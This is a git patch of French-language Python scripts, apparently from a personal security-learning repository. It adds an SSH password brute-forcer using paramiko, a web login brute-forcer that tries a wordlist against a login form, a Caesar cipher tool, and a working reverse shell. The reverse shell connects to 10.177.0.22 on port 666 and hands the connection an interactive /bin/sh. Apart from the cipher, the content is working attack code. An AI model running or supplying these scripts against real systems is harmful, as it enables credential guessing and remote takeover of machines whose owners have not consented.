From 67c94bcdabad901f1e690d373d30417847f8009c Mon Sep 17 00:00:00 2001
From: jerome <jerome@xlinfo.fr>
Date: Wed, 27 Dec 2023 17:47:12 +0100
Subject: ajouts

---
 bruteSSH.py     | 48 ++++++++++++++++++++++++++++++++++++++++++++++++
 bruteWeb.py     | 27 +++++++++++++++++++++++++++
 bruteforce.py   | 27 ---------------------------
 cesar.py        | 20 ++++++++++++++++++++
 reverseshell.py |  8 ++++++++
 5 files changed, 103 insertions(+), 27 deletions(-)
 create mode 100644 bruteSSH.py
 create mode 100644 bruteWeb.py
 delete mode 100644 bruteforce.py
 create mode 100644 cesar.py
 create mode 100644 reverseshell.py

diff --git a/bruteSSH.py b/bruteSSH.py
new file mode 100644
index 0000000..9f2a001
--- /dev/null
+++ b/bruteSSH.py
@@ -0,0 +1,48 @@
+import sys
+import paramiko
+import socket
+import time
+import os
+
+# anything that running this program prints to stderr should be
+# redirected to /dev/null
+#
+os.dup2(os.open(os.devnull, os.O_WRONLY), 2)
+
+def is_ssh_open(hostname, username, password):
+    # initialize SSH client
+    client = paramiko.SSHClient()
+    # add to know hosts
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    try:
+        client.connect(hostname=hostname, username=username, password=password, timeout=3)
+    except socket.timeout:
+        # this is when host is unreachable
+        print(f"[!] Host: {hostname} is unreachable, timed out.")
+        return False
+    except paramiko.AuthenticationException:
+        print(f"[!] Invalid credentials for {username}:{password}")
+        return False
+    except paramiko.SSHException:
+        print(f"[*] Quota exceeded, retrying with delay...")
+        # sleep for a minute
+        time.sleep(60)
+        return is_ssh_open(hostname, username, password)
+    else:
+        # connection was established successfully
+        print(f"[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}")
+        return True
+
+
+if __name__ == "__main__":
+
+
+    with open(sys.argv[3]) as wordlist:
+        for password in wordlist.readlines():
+            password=password.strip("\n")
+            if password.startswith('#'):
+                pass
+            else:
+                if is_ssh_open(sys.argv[1], sys.argv[2], password) == True:
+                    break
+
diff --git a/bruteWeb.py b/bruteWeb.py
new file mode 100644
index 0000000..541e673
--- /dev/null
+++ b/bruteWeb.py
@@ -0,0 +1,27 @@
+import sys
+import requests 
+
+def bruteforce(url,username,password):
+    reponse=requests.post(url=url,data={
+    "username":username,
+    "password":password
+    })
+    #print(reponse.text)
+    if "Mauvais mot de passe" in reponse.text:
+        #print("mauvais pwd")
+        return False
+    else:
+        print(f"Trouvé password \"{password}\"")
+        return True
+
+if __name__ == "__main__":
+    url = sys.argv[1]
+    dico = sys.argv[2]
+    with open(dico, 'r') as wordlist:
+        for password in wordlist.readlines():
+            password=password.strip()
+            if bruteforce(url,"jerome",password)==True:
+                sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
diff --git a/bruteforce.py b/bruteforce.py
deleted file mode 100644
index 541e673..0000000
--- a/bruteforce.py
+++ /dev/null
@@ -1,27 +0,0 @@
-import sys
-import requests 
-
-def bruteforce(url,username,password):
-    reponse=requests.post(url=url,data={
-    "username":username,
-    "password":password
-    })
-    #print(reponse.text)
-    if "Mauvais mot de passe" in reponse.text:
-        #print("mauvais pwd")
-        return False
-    else:
-        print(f"Trouvé password \"{password}\"")
-        return True
-
-if __name__ == "__main__":
-    url = sys.argv[1]
-    dico = sys.argv[2]
-    with open(dico, 'r') as wordlist:
-        for password in wordlist.readlines():
-            password=password.strip()
-            if bruteforce(url,"jerome",password)==True:
-                sys.exit()
-
-#bruteforce("http://localhost/page.php","jerome","secret")
-
diff --git a/cesar.py b/cesar.py
new file mode 100644
index 0000000..ca6fb12
--- /dev/null
+++ b/cesar.py
@@ -0,0 +1,20 @@
+liste=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
+
+def decalage(lettre,liste,clef):
+    for i in range(len(liste)):
+        if lettre not in liste:
+            return lettre
+        elif lettre==liste[i]:
+            return str(liste[i+clef])
+
+message_chiffre = str()
+while True:
+    message = input('Entrez le texte à chiffrer (q pour quitter) : ')
+    if message == "q" or message =="Q":
+        print("bye")
+        exit()
+    clef = int(input('Entrez votre clef : '))
+    for lettre in message:
+        message_chiffre += decalage(lettre,liste,clef)
+    print(message_chiffre)
+    message_chiffre=""
diff --git a/reverseshell.py b/reverseshell.py
new file mode 100644
index 0000000..283486e
--- /dev/null
+++ b/reverseshell.py
@@ -0,0 +1,8 @@
+import socket,subprocess,os
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("10.177.0.22",666))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(["/bin/sh","-i"])
+
-- 
cgit v1.2.3